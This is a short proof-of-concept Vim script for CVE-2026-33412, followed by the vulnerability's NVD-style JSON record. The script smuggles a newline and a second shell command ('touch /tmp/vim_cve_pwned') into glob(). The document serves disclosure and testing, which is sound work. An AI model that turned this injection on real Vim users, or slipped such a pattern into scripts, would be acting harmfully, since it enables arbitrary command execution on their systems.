CVE-2026-33412

""" PoC for CVE-2026-33412 (Vim glob() Command Injection) Description: This script demonstrates how a newline character in the glob() pattern can lead to command execution on Unix-like systems. Usage: Open this file in a vulnerable Vim version (< 9.2.0202) and source it. """ function! ExploitCVE() " The vulnerability is triggered by passing a newline character to glob() " The shell interprets the newline as a command separator. " Example: Create a file named 'pwned' via touch command. let l:malicious_payload = "/tmp/*" . "\n" . "touch /tmp/vim_cve_pwned" " Calling glob() with the payload call glob(l:malicious_payload) echo "Check if /tmp/vim_cve_pwned exists." endfunction call ExploitCVE()

{"cve": {"id": "CVE-2026-33412", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:29.740", "lastModified": "2026-03-25T21:59:14.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vim is an open source, command line text editor. Prior to version 9.2.0202, a command injection vulnerability exists in Vim's glob() function on Unix-like systems. By including a newline character (\\n) in a pattern passed to glob(), an attacker may be able to execute arbitrary shell commands. This vulnerability depends on the user's 'shell' setting. This issue has been patched in version 9.2.0202."}, {"lang": "es", "value": "Vim es un editor de texto de línea de comandos, de código abierto. Antes de la versión 9.2.0202, existe una vulnerabilidad de inyección de comandos en la función glob() de Vim en sistemas tipo Unix. Al incluir un carácter de nueva línea (\\n) en un patrón pasado a glob(), un atacante podría ejecutar comandos de shell arbitrarios. Esta vulnerabilidad depende de la configuración 'shell' del usuario. Este problema ha sido parcheado en la versión 9.2.0202."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.2.0202", "matchCriteriaId": "E79E22DB-B3DB-45AC-9D86-F917E6A7EC6C"}]}]}], "references": [{"url": "https://github.com/vim/vim/commit/645ed6597d1ea896c712cd7ddbb6edee79577e9a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vim/vim/releases/tag/v9.2.0202", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vim/vim/security/advisories/GHSA-w5jw-f54h-x46c", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/19/10", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}]}}